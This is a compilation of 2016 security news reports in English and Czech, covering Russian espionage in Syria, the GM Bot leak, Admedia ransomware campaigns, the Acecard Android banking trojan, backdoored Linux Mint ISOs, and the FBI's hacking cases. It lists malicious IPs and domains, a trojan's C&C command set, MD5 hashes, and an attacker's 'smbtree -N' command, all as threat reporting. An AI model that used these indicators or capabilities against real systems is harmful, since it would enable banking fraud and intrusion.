Russian Nation-state hackers intensify operations in Syria
23.2.2016 Hacking

According to security experts Russian nation-state hackers are behind cyber espionage campaigns against opposition groups and NGOs in Syria.
Russia is behind a cyber espionage campaign against Syrian opposition groups and NGOs, the Kremlin wants to conduct a PSYOP to influence the sentiment of the country on the humanitarian crisis as a diversionary action for its military operations in the area.

The Russian hackers target most active human rights organizations and aid groups in the country, including the Syrian Observatory of Human Rights.

The experts have found many similarities with other operations conducted by Russian nation-state actors that operated for example during the Ukrainian crisis.

Hackers used malware to compromise the targeted organizations and spread disinformation from victims’ official accounts.

Russia Syria hacking -

Source BBC

Security experts at FireEye have collected evidence of the activity of Russian nation-state hackers against Syrian organizations. Richard Turner, head of Middle East and Europe at FireEye revealed that the hacking activity of Russian entities had been intensifying since the start of the year.

“APT 28 and other Russian groups are now really focusing their attention on the collection of data on Syrian groups, particularly those focused on human rights and the monitoring of Russian military activity,” explained Turner. “It’s a very significant operation.” “Clearly this is to enable them to respond politically . . . to target [the groups] for information warfare and to have an impact on the conflict itself,”

The Financial Times reported the a discussion with two senior intelligence officials, that sustain the involvement of the Russian FSB in the espionage campaign.

“Details of the Syrian campaign were discussed with two senior intelligence officials, one from Europe and one from a country neighbouring Syria. The operation was large in scale and systematic in nature, one of them said, speaking on condition of anonymity, adding that the campaign was directed by the FSB, Russia’s state security agency.” states a blog post on the Financial Times.

According to the intelligence experts, Russian hackers are also targeting organisations in Turkey managing information related the involvement of the Turkish government in the conflict in Syria. Russian hackers are collecting any kind of information on the Turkish Government due to the worsening of the relationship among the two countries.

Western intelligence fears the evolution of the events in Syria, western politicians believe that Russia is involved in the fight against Isis in the country to support the Bashar al-Assad’s Government against dissident. Many organizations are accusing the Russian forces in the area for attacks against civilian and opponents of the regime.

The experts at FireEye discovered that hackers launched spear-phishing campaign against their targets and also used replicas of legitimate organisations’ websites to track visitors and identify opponents of the Regime.

“It could be for two reasons,” said Jens Monrad, global intelligence liaison at FireEye. “One is to send out false information from those groups, or they could be using their credentials as stepping stones to go on and target other individuals or organisations. It all fits with Russia’s traditional information warfare doctrine.”


Eliminaci síťových hrozeb usnadní propojení nástrojů LOGmanager a AddNet

22.2.2016 Zabezpečení
Propojení bezpečnostních produktů LOGmanager a AddNet oznámily firmy Sirwisa a Novicom. Cílem je výrazně zkrátit a zjednodušit klíčový proces reakce na kybernetické bezpečnostní hrozby – od zjištění hrozby po její úplné zamezení nebo izolace kompromitovaného zařízení v síti organizací.

Systém LOGmanager, centrální úložiště logů a SIEM, tak nově dokáže zpracovávat logy z bezpečnostního řešení AddNet pro správu IP adresního prostoru a řízení bezpečnosti přístupu v rozsáhlých sítích.

Bude tak pracovat s klíčovými informacemi poskytnutými systémem AddNet a umožní tak například přímé prokliknutí z IP adresy pracovní stanice na informace o jejím umístění, a to nejen o tom, na kterém přepínači a v jaké VLAN je stanice umístěna, ale také přímo na informaci o fyzickém umístění – místnosti.

„Systém AddNet chápeme jako klíčovou součást konceptu Aktivní bezpečnost sítě, a proto chceme v našem LOGmanageru informacím z tohoto bezpečnostního systému plně rozumět a umět je interpretovat správcům sítě a bezpečnostním manažerům s maximálním komfortem,“ tvrdí Filip Weber, výkonný ředitel firmy Sirwisa.

Podle Jindřicha Šavela, obchodního ředitele Novicomu, jejich firma vidí v podobných integracích velký přínos a věří, že spojením sofistikovaného nástroje detekce kybernetických hrozeb s praktickým nástrojem okamžité lokalizace zařízení (detailní L2 monitoring) s přímou možností jeho odpojení (NAC) dostávají administrátoři velice pokročilé řešení s možností reakce v řádu sekund.


GM Bot (Android Malware) Source Code Leaked Online
22.2.2016 Android
The source code of a recently discovered Android banking Trojan that has the capability to gain administrator access on your smartphone and completely erase your phone's storage has been LEAKED online.
The banking Trojan family is known by several names; Security researchers from FireEye dubbed it SlemBunk, Symantec dubbed it Bankosy, and last week when Heimdal Security uncovered it, they dubbed it MazarBot.
All the above wave of Android banking Trojans originated from a common threat family, dubbed GM Bot, which IBM has been tracking since 2014.
GM Bot emerged on the Russian cybercrime underground forums, sold for $500 / €450, but it appears someone who bought the code leaked it on a forum in December 2015, the IBM X-Force team reported.
What is GM Bot and Why Should You Worry about it?
The recent version of GM Bot (dubbed MazarBOT) has the capability to display phishing pages on the top of mobile banking applications in an effort to trick Android users into handing over their financial credentials to the fraudsters.
Besides this, the banking trojan is also capable of forwarding phone calls and intercepting SMS messages to help fraudsters bypass an additional layer of bank security mechanisms, and locking a device’s screen.
Cyber criminals could also use the malware to:
Spy on victims
Delete data from the infected device
Gain boot persistence to help survive device restart
Send and Read your SMS message
Make Calls to your contacts
Read the phone's state
Plague phone's control keys
Infect your Chrome browser
Change phone settings
Force the phone into sleep mode
Query the network status
Access the Internet
Wipe your device's storage (the most critical capabilities of the malware)
However, someone leaked the malware source code only to boost his/her reputation on an underground forum, according to the researchers.
GM Bot Android Malware Source Code for FREE
Yes, the source code for GM Bot and its control panel is now accessible to cybercriminals and fraudsters for FREE.
Here’s the Cherry on the Top:
Besides the source code, the leader also posted a tutorial and instructions for server-side installation, which means cybercriminals can create their own versions of the malware strain to conduct online banking frauds.
Though the archive file containing the source code and its control panel is password protected, the leader is offering the password only to active forum members who is approaching him.
"Those who received the password, in turn, passed it on to other, unintended users, so the actual distribution of the code went well beyond that discussion board’s member list," IBM cyber security evangelist Limor Kessem wrote in a blog post.
Online users had started sharing the password to the archive among their friends, and in no time, the GM Bot source code was all over the hacking underground forums.
GM Bot is one of the most dangerous banking trojan in the Android ecosystem and after its source code gets leaked, users are recommended to beware while banking online.
How to Protect Yourself?
As I previously mentioned, online users are advised to follow these steps in order to protect themselves against this kind of threat:
Never open attachments from unknown sources.
Never click on links in SMS or MMS messages sent to your phone.
Even if the email looks legit, go directly to the source website and verify any possible updates.
Go to Settings → Security → Turn OFF "Allow installation of apps from sources other than the Play Store" option.
Always keep an up-to-date Anti-virus app on your Android devices.
Avoid unknown and unsecured Wi-Fi hotspots and Keep your Wi-Fi turned OFF when not in use.


NSA Data Center Experiencing 300 Million Hacking Attempts Per Day
22.2.2016 Hacking
Utah State computer systems are experiencing a massive cyber attack on up to 300 Million Hacking attempts per day due to National Security Agency’s (NSA) data center in the state.
Yes, 300,000,000 hacking attempts in a day!
According to the statistical survey, it is evident that the computer systems in the US State of Utah began to experience the hacking attack a few years back, precisely, soon after the NSA revelations by global surveillance whistleblower Edward Snowden.
It is a less-known fact that the NSA has built its new data center near the city of Bluffdale, Utah. However, a couple of years back, when Snowden revealed the presence of the data center, the attacks have constantly been going on.
The PRISM spying program by Big Brothers at NSA might have shifted the attention of hackers for the retaliation against mass-surveillance and flared up this heightened cyber attacks against the spying agency.
According to Utah Commissioner of public safety, Keith Squires, as quoted by KUTV:
"In 2010, my IT director was letting me know that the number of attacks we were averaging a day was between 25,000 to 80,000. We had peaks in the past year or so that were over 300,000,000 a day."
Additionally, advanced weapons systems at Hill Air Force Base and other tech companies in Utah could also be the reason for this fueling cyber attacks.
TECHNICALITIES
The Security officers had identified the sudden influx of IP traffic traced into foreign IP ranges and said the incident would be a model of a botnet attack.
The botnet network scans for the technical glitches in the communication pathways to infect the system, as per its Command and Control (C&C) instructions.
In an attempt to minimize the attacking vector, Utah Security Officer had blocked the IP addresses from China, Russia, and Indonesia.
In the majority of cases, hackers are trying to gain a single access by many tactical ploys that could lead them to land into the NSA mainframes.
As NSA has been alarmed a warning bell; a short note for the hackers
The Big Brother is Watching you…!


Admedia attacks now rely also on Joomla to serve ransomware

22.2.2016 Virus

Operators running websites based on the WordPress and Joomla must be aware of a spike in the number of compromised platforms used in Admedia attacks.
Not only WordPress CMS, threat actors behind the “Admedia attacks” are now looking with increasing interest to Joomla. This is the discovery made by the experts at the Internet Storm Center (ISC) that discovered the presence of the bad actors responsible of the Admedia attacks, behind a hacking campaign that targeted Joomla-hosted sites.

Early February, experts at Sucuri reported a spike in compromised WordPress sites generating hidden iframes with malicious URLs referencing domain hosting exploit kit. The researchers at Sucuri observed the use of the string “admedia” in most URLs generated by the iframes.

“These “admedia” URLs act as a gate between the compromised website and the EK server. EK traffic associated with this campaign has generally sent TeslaCrypt ransomware. However, characteristics of this campaign have evolved since Sucuri’s original blog post.” states an analysis published by the Internet Storm Center (ISC).

The campaign is evolving, on Wednesday 2016-02-17 Brad Duncan, security researcher at Rackspace, discovered the new attack chain. The attacks started with a compromised website that generated an admedia gate, which led to Angler EK that is used to serve TeslaCrypt to vulnerable machines. The experts also highlighted that crooks behind the admedia attacks that initially relied on Nuclear exploit kit on compromised sites, now added the Angler exploit kit.

The analysis of the traffic generated by the malware allowed the ISC to identify the following components:

178.62.122.211 – img.belayamorda.info – admedia gate
185.46.11.113 – ssd.summerspellman.com – Angler EK
192.185.39.64 – clothdiapersexpert.com – TeslaCrypt callback traffic
The attackers compromised website generate the admedia gate by injecting malicious scripts.

“As the Sucuri blog already reported, each .js file returned by the compromised site had malicious script appended to it. In a case on 2016-02-15, I also saw the same type of script included in an HTML page from the compromised website; however, today’s traffic only shows injected script in the .js files.” Duncan wrote.

Wrodpress Joomla Admedia attacks

The above image demonstrates that attackers have started using “megaadvertize” in their gateway URLs, instead of “admedia.”


The Evolution of Acecard
22.6.2016 Zdroj: Kaspersky  Virus

While working on the IT Threat Evolution report for Q3 2015, we discovered that Australia had become the leading country in terms of number of users attacked by mobile banker Trojans. We decided to find out what was behind this jump in activity and managed to identify the cause: Trojan-Banker.AndroidOS.Acecard. This family accounted for almost all the banker Trojan attacks in Australia.

After analyzing all the known malware modifications in this family, we established that they attack a large number of different applications. In particular, the targets include nine official social media apps that the Trojan attacks in order to steal passwords. Two other apps are targeted by the Trojan for their credit card details. But most interestingly, the list includes nearly 50 financial apps (client software for leading global payment systems and banks) and services, and the various modifications of Acecard make use of all the tools at their disposal to attack them – from stealing bank text messages to overlaying official app windows with phishing messages.

Here is another interesting fact that we established while investigating the Trojan: the modifications of Acecard were written by the same cybercriminals who earlier created Backdoor.AndroidOS.Torec.a, the first TOR Trojan for Android, as well as Trojan-Ransom.AndroidOS.Pletor.a, the first encryptor for mobile devices. All three Trojans run on Android.

How it all started

Given Acecard’s growing popularity and the rich criminal past of its creators, we decided to delve deeper into the history of this malware family.

It all started with Backdoor.AndroidOS.Torec.a. The first version of this malicious program was detected in February 2014 and could perform the following commands from the C&C server:

#intercept_sms_start – start intercepting incoming SMSs;
#intercept_sms_stop – stop intercepting incoming SMSs;
#ussd – create a USSD request;
#listen_sms_start – start stealing incoming SMSs;
#listen_sms_stop – stop stealing incoming SMSs;
#check – send information about the phone (phone number, country of residence, IMEI, model, OS version) to C&C;
#grab_apps – send a list of applications installed on the mobile device to the C&C;
#send_sms – send an SMS to numbers specified in the command;
#control_number – change the phone’s control number.
Then, in April 2014, a new version emerged with more capabilities. The additional commands were:

#check_gps – send the device’s coordinates to the C&C;
#block_numbers – add numbers to the SMS interception list;
#unblock_all_numbers – clear the SMS interception list;
#unblock_numbers – remove specified numbers from the SMS interception list;
#sentid – send an SMS with the Trojan’s ID to a specified number.
In late May 2014, we detected the first mobile encryptor, Trojan-Ransom.AndroidOS.Pletor.a. It encrypted files on the device and demanded a ransom for them to be decrypted. Some modifications of Pletor used TOR to communicate with the C&C.

A month later, we detected a new modification, Backdoor.AndroidOS.Torec. Unlike previous versions, it did not use TOR and targeted credit card details: the Trojan overlaid the official Google Play Store app with a phishing window that included data entry fields.

 

We assigned the verdict Trojan-Banker.AndroidOS.Acecard.a to this modification, and classified it as a separate family of malware. From that moment on, all new versions of the Trojan have been detected as belonging to the Acecard family.

An analysis and comparison of the code used in Backdoor.AndroidOS.Torec.a, Trojan-Ransom.AndroidOS.Pletor.a and Trojan-Banker.AndroidOS.Acecard.a has shown they were all written by the same cybercriminals. Here are some clear examples:

 

Code from the SmsProcessor class of the Trojan Backdoor.AndroidOS.Torec.a

 

Code from the SmsProcessor class of Trojan-Banker.AndroidOS.Acecard.a

 

Code from the SmsProcessor class of Trojan-Ransom.AndroidOS.Pletor.a

Here is another example:

 

Code from the SmsProcessor class of the Trojan Backdoor.AndroidOS.Torec.a

 

Code from the SmsProcessor class of Trojan-Banker.AndroidOS.Acecard.a

 

Code from the SmsProcessor class of Trojan-Ransom.AndroidOS.Pletor.a

A lot of the class, method and variable names are the same for all three Trojans. The code of the corresponding methods is either the same or very similar with only minor differences.

Acecard’s progress

The initial Trojan, Trojan-Banker.AndroidOS.Acecard.a, could only handle four commands sent from the C&C:

#intercept_sms_start – start intercepting incoming SMSs;
#intercept_sms_stop – stop intercepting incoming SMSs;
#send_sms – send an SMS to the number specified in the command;
#control_number – change the phone’s control number.
The next modification of Acecard was detected in late August 2014 and used the TOR network for C&C communication, just like the earlier Pletor. Besides that, we identified two more differences. Firstly, the list of supported commands had grown to 15; nearly all of these commands had been seen before in earlier versions of the Trojan Torec:

#intercept_sms_start – start intercepting incoming SMSs;
#intercept_sms_stop – stop intercepting incoming SMSs;
#ussd – create a USSD request;
#check_gps – send the device’s coordinates to the C&C;
#block_numbers – add numbers to the list of senders from which SMSs will be intercepted;
#unblock_all_numbers – clear the SMS interception list;
#unblock_numbers – remove specified numbers from the SMS interception list;
#listen_sms_start – start stealing incoming SMSs;
#listen_sms_stop – stop stealing incoming SMSs;
#check – send the Trojan’s ID to the C&C;
#grab_apps – send the list of applications installed on the mobile device to the C&C;
#send_sms – send an SMS to the number specified in the command;
#control_number – change the phone’s control number;
#sentid – send an SMS with the Trojan’s ID to a specified number;
#show_dialog – show a dialog window to the user with specific objects (data entry fields, buttons etc.) depending on the C&C command parameters.
The second difference was the number of phishing windows. Along with the official Google Play Store app, this Trojan now overlaid the display of the following apps with its own windows:

IM services: WhatsApp, Viber, Instagram, Skype;
 

The apps of the VKontakte, Odnoklassniki and Facebook social networks
 

The Gmail client
 

The official Twitter client
 

In the second half of October 2014, we detected the next modification of Acecard. It no longer used TOR (neither have any of the versions of the Trojan subsequently detected). However, there was another, more important difference: starting with this version of the Trojan, there have been dramatic changes in the geography of the targeted users. The earlier versions mostly attacked users in Russia, but starting in October 2014 the bulk of Acecard attacks targeted users in Australia, Germany and France. Russia accounted for just 10% of the attacked users. This trend continued for another four months, until February 2015, but even then Australia, Germany and France still remained among the most frequently attacked countries.

At the same time, the geography of Pletor attacks remained largely unchanged: most attacks targeted, and continue to target, users in Russia and the US. The TOP 5 most attacked countries also includes Ukraine, Belarus and Saudi Arabia.

A new modification of Acecard emerged in mid-November 2014. As well as stealing passwords from popular social network clients, it started to overlay the banking app of Australia’s most popular bank with a phishing window. Just two days later, we managed to detect another modification of this Trojan that was already attacking the apps of four Australian banks.

 

This functionality has persisted up to the very latest Trojan-Banker.AndroidOS.Acecard modifications that we detect.

This version of Acecard also checks the country code and the service provider code as it launches, and if it finds itself in Russia, it shuts down. This check is carried out in almost all subsequent modifications. Interestingly, similar changes to Trojan-Ransom.AndroidOS.Pletor only took place in late March 2015, and did not extend to all versions of the malware.

For the next nine months, there was practically no change in the functionality of the new Acecard modifications that emerged, until early August 2015 when we detected a new version that was capable of overlaying the PayPal mobile app with its own phishing window.

 

There was also a new command that this version could perform – #wipe. When this command is received, Acecard resets the mobile device to factory settings.

It should be noted that there has been a dramatic increase in Acecard developer activity since June 2015. Before, we typically identified 2-5 files a month related to this Trojan; since June we have detected around 20 files per month.

 

Number of Acecard files detected each month

The graph above shows the number of files associated with the banking Trojan Acecard that are detected each month; these include both the modifications of Acecard and related files, such as downloader Trojans. The dramatic rise in file numbers detected in November and especially December is down to the malware writers making active use of a commercial code obfuscator and the emergence of obfuscated versions of the Trojan.

Also at this time, there was an increase in the number of attacks using this malicious program.

 

The number of unique users attacked by Acecard per month

In the first half of September, we detected a new modification of Acecard. Its new capabilities included overlaying the windows of more mobile banking apps, including those of one Australian bank, four New Zealand banks and three German banks.

 

It means this modification of the Trojan is capable of overlaying 20 apps – including 13 banking apps – with a phishing window.

The subsequent development of Acecard’s “banking business” then got even faster:

The next modification emerged just several days later, and was capable of overlaying as many as 20 banking applications. The list of targeted apps grew to include another app belonging to an Australian bank, four apps for Hong Kong banks and three for Austrian banks.
In late September, a new modification came out with a new functionality: the malicious program included a list of bank phone numbers, so text messages arriving from those banks are redirected to the cybercriminal. The Trojan has a list of phrases, so it can compare incoming text messages and identify those with verification codes for bank operations or registration, and send just the code to the cybercriminal, rather than the full SMS. This version of Acecard intercepts SMSs from 17 Russian banks.
Early October saw the emergence of a new modification that attacked the banking apps of the three largest US banks. Interestingly, from the very start, the US has been among the TOP 10 countries most often attacked by this Trojan; however, December 2015 saw a dramatic rise in the number of attacks on US users. In that month, the US came third in terms of the number of unique users attacked by this malware.
In mid-October, a new modification appeared capable of overlaying as many as 24 financial applications, including apps belonging to five Australian banks, four Hong Kong banks, four Austrian banks, four New Zealand banks, three German banks, three Singapore banks, and the PayPal app.
A new modification was detected in early November that has a phishing window that targets an app belonging to a Spanish bank.
It should also be noted that virtually all versions of Acecard can handle a C&C command that orders the Trojan to overlay any specified app with its own window. Perhaps the cybercriminals thought this option was more promising, because many of the versions detected in November and December 2015 have a dedicated window that only overlays Google Play and Google Music apps to target credit card details. No other applications will be overlaid without first receiving the appropriate C&C command.

 

The most recent versions of the Acecard family can attack the client applications of more than 30 banks and payment systems. Considering that these Trojans are capable of overlaying any application upon command, the overall number of attacked financial applications may be much larger.

Although the Trojans belonging to this family can attack users from a long list of countries, most attacks target users in Russia, Australia, Germany, Austria and France.

 

Number of unique users attacked by country

In Germany and Australia, the Trojan-Banker.AndroidOS.Acecard family is the most widespread type of mobile banker Trojan targeting users.

Propagation

In many countries, Trojans belonging to the Acecard family are typically distributed with the names Flash Player or PornoVideo, although other names are sometimes used in a bid to imitate useful and popular software. This malware family also propagates with the help of downloader Trojans that are detected by Kaspersky Lab’s products as Trojan-Downloader.AndroidOS.Acecard.

We should note that on 28 December we were able to spot a version of the Acecard downloader Trojan – Trojan-Downloader.AndroidOS.Acecard.b – in the official Google Play Store.

 

A Trojan-Downloader.AndroidOS.Acecard.b page in Google Play Store

The Trojan propagates under the guise of a game, but in reality it has no useful functionality. The main goal of this malicious app is to download and install a fully functional modification of the banking Trojan Acecard. Its creators didn’t even bother to make it look like a legitimate application: when the malware is installed from Google Play, the user will only see an Adobe Flash Player icon on the desktop screen.

 

We have also been able to detect a new modification of the downloader Trojan, Trojan-Downloader.AndroidOS.Acecard.c. It differs in that the Trojan, once launched, uses vulnerabilities in the system to gain super-user rights. With these privileges – Trojan-Downloader.AndroidOS.Acecard.c can install the banking Trojan Acecard into the system folder, which makes it impossible to delete using standard tools. However, in most cases this propagation method is used to spread another Trojan that we are already familiar with – Trojan-Ransom.AndroidOS.Pletor.

The cybercriminals are using virtually every available method to propagate the banking Trojan Acecard, be it under the guise of another program, via official app stores, or via other Trojans. This combination of propagation methods, which includes the exploitation of vulnerabilities in the operating system, along with Acecard’s capabilities make this mobile banker one of the most dangerous threats to users.

MD5

58FED8B5B549BE7ECBFBC6C63B84A728
8D260AB2BB36AEAF5B033B80B6BC1E6A
CF872ACDC583FE80B8F54957E14355DF
FBBCCD640CE75BD618A7F3187EC1B742
01E8CEA7DF22B1B3CC560ACB049F8EA0
DDCE6CE143CCA26E59063E7A4BB89019
9D34FC3CFCFFEA760FC1ADD377AA626A
03DA636518CCAF432AB68B269F7E6CC3
05EBAA5C7FFA440455ECB3519F923B56
E3FD483AD3731DD62FBE027B4E6880E6
53888352A4A1E3CB810B2A3F51D0BFC2
E1C794A614D5F6AAC38E2AEB77B139DA
54332ED8EA9AED12400A75496972D7D7
5DB57F89A85F647EBBC5BAFBC29C801E
702770D70C7AAB793FFD6A107FD08DAD
CF25782CAC01837ABACBF31130CA4E75
07DF64C87EA74F388EF86226BC39EADF


Beware of Backdoored Linux Mint ISOs
22.2.2016 Zdroj: Kaspersky Virus

Yesterday a blog post on “The Linux Mint Blog” caught our attention. Apparently criminals managed to compromise a vulnerable instance of WordPress which the project used to run their website. The attackers modified download links pointing to backdoored ISO files of Linux Mint 17.3 Cinnamon edition. This “should only impact people who downloaded this edition on February 20th”, the author of the blog stated.

We managed to get our hands on the malware embedded in the ISO images. Let’s have a quick look.
 

Malware used

The criminals used a simple backdoor, which is controlled via an unencrypted IRC connection. We found five hardcoded C&C addresses. At the time of writing only one of them was available. We saw approx. 50 connected clients just in this channel called “#mint”:

IRC channels and user count on malicious C&C server

The malware is capable of:

running several types of UDP and TCP flooding (used in DDoS attacks)
downloading arbitrary files to the victim’s machine
executing arbitrary commands on the machine
We’re detecting this type of malware as HEUR:Backdoor.Linux.Tsunami.bh.

According to user reports, the compromised ISO images come with the backdoor’s C-source code, located in /var/lib/man.cy, which is compiled on first startup to “apt-cache” and is then executed.

Activity

While monitoring the C&C channel, we saw the criminal sending several SMB-related commands like “smbtree -N” to the connected bots. Apparently the attacker tries to access SMB/CIFS shares available in the local network of the victims.

Conclusion

In order to detect this kind of attack, one should use PKI with strong cryptographic signatures to ensure the integrity of downloaded software.

Integrity-checks based on file hashes like MD5 or SHA256 are insecure if a project’s website is compromised, since the attacker could also adjust the checksums provided on the website.


FBI must reveal the network investigative technique used to hack more than 1000 computers

22.2.2016 Hacking

The FBI must provide details on the network investigative technique used to hack more than 1000 computers in a case involving child pornography.
In a case involving child pornography, the FBI was ruled by a judge to provide all the code used to hack the PC of suspects and detailed information related to the procedure they have followed to de-anonymize Tor users.

Colin Fieman, a federal public defender working on the case was asked by motherborard.vice.com if the code would include exploits to bypass security features, Fieman’s reply was that the code would bypass “everything.”

“The declaration from our code expert was quite specific and comprehensive, and the order encompasses everything he identified,” he told to MotherBoard.

Fieman is defending Jay Michaud, a Vancouver public schools administration worker arrested by the FBI right after the FBI closed a popular child pornography site called “Playpen” hosted in the dark web, and where a network investigative technique (NIT)—the agency’s term for a hacking tool.

The use of the NIT was also confirmed earlier this year when according to court documents reviewed by Motherboard, the FBI had used it to identify the suspects while surfing on the Tor network.

The network investigative technique (NIT) got the suspects’ real IP address, the MAC address and other pieces of information and sent them to the FBI machines.

In July, at least two individuals from New York have been charged with online child pornography crimes after visiting a hidden service on the Tor network.

According to the court documents, the FBI monitored a bulletin board hidden service launched in August 2014, named Playpen, mainly used for “the advertisement and distribution of child pornography.” The FBI was able to harvest around 1300 IPs, and until the moment 137 people have been charged. The network investigative technique used by the FBI included computers in the UK, Chile and Greece.

In January, a report published by the Washington Post confirmed that in the summer of 2013 Feds hacked the TorMail service by injecting the NIT code in the mail page in the attempt to track its users.

The problem is that the FBI used only one warrant to hack computers of unknown suspects all over the world. The defense also argues that the FBI left the child pornography site running in order to be able to do the network investigative technique.

Last month a judge rules that the FBI’s actions did not constitute “outrageous conduct.”, but now a new order got out and obligates the FBI to disclose all the code components used in the network investigative technique.

Michaud’s lawyers were trying to get access to the technique and code used by the FBI since September but it wasn’t until January that Vlad Tsyrklevitch (the defense’s consulted expert) received the discovery.

Tsyrklevitch now argues that the provided code was incomplete, missing several parts. Part of the missing code is the one that identifies Michaud PC. Tsyrklevitch also claimed that part of the code missing is the exploit used to break into machines.

“This component is essential to understanding whether there were other components that the Government caused to run on Mr. Michaud’s computer, beyond the one payload that the Government has provided,” Michaud’s lawyers wrote,

Tormail Network investigative technique

It is not the first time that judges requested FBI to disclose the code used in hacking operations. In 2012, a case called Operation Torpedo the FBI disclosed the details a Metasploit module used for their investigation.

Wired revealed that the law enforcement relied on the popular Metasploit framework to first de-anonymize operators of child porn websites in the Tor network.

“Now Metasploit has a new and surprising fan: the FBI. WIRED has learned that FBI agents relied on Flash code from an abandoned Metasploit side project called the “Decloaking Engine” to stage its first known effort to successfully identify a multitude of suspects hiding behind the Tor anonymity network.” states the reportpublished by Wired.

The Operation Tornado was revealed when the FBI seized three child porn sites on Tor based in Nebraska. The FBI, authorized by a special search warrant crafted by Justice Department lawyers in Washington, DC, delivered the tracking Flash code do de-anonymous visitors. The operation allowed the FBI to identify at least 25 users in the US and many others in foreign countries.

There is no doubt, cases like this one will be even more frequent and it’s possible that in the future more court order will obligate to disclose all the information about a “target”.


Na Download.com a jinde můžete chytit crapware narušující HTTPS

22.2.2016 Zdroj: Lupa.cz Incidenty

Nemusíte mít ani Lenovo, abyste si do počítače pořídili nějaký ten Superwish crapware či badware. Stačí si stáhnout software z něčeho jako Download.com.Pokud si pamatujete na aféru se Superfish softwarem předinstalovaným na noteboocích od Lenovo, tak asi tušíte, že existují podivné nápady, které vám do počítače dostanou nebezpečný software narušující šifrované (HTTPS) připojení a přinášejí možnost MITM (Man In The Middle) útoků, šmírování a další rizika.

Funguje to v zásadě tak, že do vašeho počítače (s Windows) je nainstalován falešný root certifikát schopný převzít veškerou HTTPS komunikaci tak, že jakékoliv certifikáty jsou vždy platné. V případě softwaru jménem Superfish to navíc bylo udělané tak amatérsky, že díra byla zneužitelná kýmkoliv se škodlivými nápady.

Stejný systém se používá u adwaru, které se po nasazení do vašeho počítače postará o přesměrování veškeré HTTP/HTTPS komunikace tak, aby bylo možné do stránek vkládat vlastní inzeráty. Na „trhu“ existuje podobných „řešení“ řada - například Wajam, GeniusBox, Content Explorer. Do počítače přidají vlastní certifikát a pak čtou a upravují veškerou komunikaci.

Jak upozorňuje Howtogeek,com, něco podobného můžete chytit i tak, že si na Downloads.com stáhnete a nainstalujete software, u kterého rozhodně nic takového nečekáte – v jimi zmiňovaném žebříčku deseti nejstahovanějších aplikací šlo o KMPlayer a YTD Video Downnload, ale nejsou to jediné případy.

Zelené tlačítko

Podle Howtogeek.com není vůbec jisté, jestli původcem tohoto napadání počítačů je CNET a jejich Download.com nebo jestli je adware/malware dodáván přímo autory programů. V řadě případů z historie totiž takto obohacené programy ve skutečnosti pocházely od téže firmy či jednotlivce, pouze se navenek skrývaly pod různé názvy a značky.

KMPlayer tak například obsahuje výše zmíněný Wajam a jak CNET, tak případný tvůrce KMPlayeru se dokáží poměrně snadno vykroutit z jakékoliv kritiky: instalace Wajamu totiž není utajená a uživatel je dotázán, zda si Wajam přeje nainstalovat. Což zpravidla vede k tomu, že stiskne zelené tlačítko Accept místo správného oranžového Decline.

Smyslem těchto úprav je samozřejmě to, že vám bude dodávána reklama na místech, kde by normálně nebyla. Útok na šifrované připojení má jasný důvod: přes HTTPS dnes běží většina podstatných služeb a webů. V dobách dřívějších podobnému softwaru stačilo, když převzal kontrolu nad nešifrovaným spojením.

Zásadní problém je v tom, že program kompletně zruší jakékoliv hlídání platnosti certifikátů a tím i skutečně bezpečné HTTPS komunikace.

Jak odhalit, že něco takového máte v počítači?

Mimo projevy v podobě podivných reklam na místech, kde ani většinou nebývají, je poměrně složité na první pohled poznat, že se vám něco podobného dostalo do počítače. Je dobré se podívat na nastavení připojení k internetu, protože tam může být aktivované spojení přes lokální proxy (často 127.0.0.1).

Můžete zkusit spustit v příkazové řádce netstat, kde podivná připojení přes lokální síť můžete také vidět. Případné spuštění jako správce a použití netstat -b pomůže při identifikaci programů, ze kterých ona spojení probíhají. Budete-li tápat nad IP adresami, tak pomůže netstat -f, které je převede na doménová jména (tam, kde je to možné).

Spoléhat se na to, že adware/crapware objeví antivirus, je obvykle dost marné, velmi málokdy je detekují, nepovažují je totiž za viry. Mohou pomoci antimalware řešení v podobě PC Decrapifier, Kaspersky TDSSKiller, Trojan Killer, HitmanPro 3 či Malwarebytes Anti-Malware (poslední dvě jmenované používám poměrně často s dobrými zkušenostmi).

Bývá dobré podívat se i do certifikátů, které máte ve Windows (ale pozor, budou ještě ve všech prohlížečích). Stačí jít do MMC (Microsoft Management Console) s přidaným modulem Certifikáty. Pak vyberete Účet počítače. Po přidání vás budou zajímat „Důvěryhodné kořenové certifikační autority“, ale má to celé jeden zásadní nedostatek – je jich tam opravdu hodně a poznat ty podvodné není jednoduché – trochu může pomoci, že jsou známa nejpoužívanější jména: Sendori, Purelead, Rocket Tab, Super Fish, Lookthisup, Pando, Wajam, WajaNEnhance, DO_NOT_TRUSTFiddler_root, System Alerts, CE_UmbrellaCert.

Můžete zkusit i některý z online testů (například superfish.tlsfun.de), které zkoušejí, jestli v počítači některé z podvržených certifikátů nemáte. Ale tady pozor, nezjištění problému nemusí znamenat, že nejste napadení.

A nezapomeňte, že antivirové programy instalují MITM stejně jako tyto podvodné programy. Pokud jste svěřili vašemu antivirovému programu kontrolu vaší komunikace přes web, tak to nebyl rozhodně ten nejlepší nápad.


Mnoho povyku pro PIN. O co vlastně jde v boji mezi FBI a Applem

22.2.2016 Zdroj: Lupa.cz Mobilní

FBI se chce dostat do telefonu útočníka ze San Bernardina, Apple to odmítá, místní policie pokazila, co mohla, a svět se diví.
Je to vlastně hrozně jednoduché a zároveň hrozně složité. Zlá, ošklivá FBI žene Apple k soudu, protože ji firma odmítá umožnit proniknout do telefonu útočníka ze San Bernardina. Na jedné straně je tu terorista, do jehož telefonu se FBI potřebuje dostat. Má jasný a logický důvod a veskrze neodmítnutelnou motivaci.

Na druhé straně stojí Apple, který daný mobilní telefon vyrobil a který je přesvědčen o tom, že soukromí zákazníků je soukromí zákazníků. Zdánlivě odmítá FBI pomoci – i když tady už to tak jednoduché není. Rozhodně ale odmítá vytvoření zadních vrátek do iPhonu, tedy alespoň takto to Apple předkládá, další firmy to také tak chápou a hlasitě podporují. Ze strany FBI a amerického ministerstva spravedlnosti zaznívá něco o tom, že Apple si pouze dělá svůj marketing, ale až na Donalda Trumpa moc podpory v tomto ohledu nemá.

Zajímavé na tom všem je ještě to, že místní policie v San Bernardinu měla – po instruktáži od FBI – provést jednu z poměrně zásadních, až hloupých chyb: resetovala v dotyčném telefonu heslo do iCloudu ve snaze „získat přístup k zálohám“. Kdyby tenhle krok neudělali, tak zde byly minimálně čtyři možnosti, jak se do telefonu dostat. Po resetu už nikoliv, upozorňuje Apple.

Zbytečná obstrukce?

